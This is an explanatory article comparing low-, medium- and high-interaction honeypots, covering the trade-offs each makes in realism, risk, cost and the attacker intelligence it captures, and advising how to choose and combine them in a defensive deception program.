High-interaction vs low-interaction honeypot

Low interaction: simple, safe, deployable at scale

A low-interaction honeypot emulates a limited set of services and responses without running a real operating system or a fully functional application. It might present an SSH banner, an open SMB port or a login page, but it never lets the attacker obtain a real shell or execute arbitrary code. The interaction is confined to the earliest phases of an intrusion: scanning, enumeration and authentication attempts.

That simplicity is exactly its strength. Because the exposed attack surface is minimal, the risk that an adversary truly takes over the decoy and uses it as a pivot into the rest of the network is very low. Maintenance is light and deployment can be massive and automated: you scatter dozens or even hundreds of sensors across an environment to catch any scan or lateral movement as early as possible.

• Low cost and resource footprint, ideal for broad coverage.
• Reduced operational risk: there is no real system to compromise.
• Intelligence limited to the initial phases (scans, tested credentials, scan signatures).
• An excellent source of high-value alerts with very few false positives, since any contact is suspicious by design.

The trade-off is twofold. First, the intelligence stays shallow: you observe intent, but rarely the tools, payloads or post-exploitation techniques. Second, a skilled attacker often detects the emulation, because the responses lack depth, the network stacks reveal artifacts, and the behaviour diverges from that of a genuine service.

High interaction: maximal realism, rich intelligence, high risk

A high-interaction honeypot exposes a real, fully fledged operating system and services. The attacker can authenticate, obtain a shell, drop files, run binaries and try to progress just as on a legitimate target. Because nothing is emulated, the decoy is extremely hard to tell apart from a production asset.

This is the most valuable source of intelligence available. You capture the entire attack chain: the exploits used, privilege escalation, dropped tooling, the command-and-control infrastructure contacted, and the adversary's tactics and procedures. This data feeds threat intelligence directly and supports the authoring of reliable detection rules.

• Deep, comprehensive intelligence on the attacker's real behaviour.
• Very low detectability: the system's realism fools even seasoned adversaries.
• Major risk: a genuinely compromised system can serve as a springboard into the network.
• High cost in isolation, monitoring, maintenance and post-compromise restoration.

That realism demands strict operational discipline. A high-interaction honeypot must be rigorously contained, through network segmentation, egress filtering and instrumentation, so that a compromise never becomes an entry point into production assets. Without this isolation, the decoy becomes a liability rather than an asset.

Medium interaction and choosing a strategy

Between the two sits medium interaction. These honeypots emulate services with more application logic than low interaction, such as a convincingly simulated command interpreter or a fake file system, without exposing a real operating system. They offer better realism and richer intelligence while retaining part of the safety of emulation, at the price of greater complexity.

The right choice depends on the objective. For early detection and broad, low-risk coverage, favour low interaction and complement it with decoys and breadcrumbs spread across the environment. For research, analysis of targeted campaigns or the production of detailed intelligence, high interaction is the way to go, provided you have the isolation and monitoring resources it requires. Most mature deceptive security programs combine both levels to pair breadth of detection with depth of analysis, leveraging the near-absence of false positives inherent to any well-designed honeypot.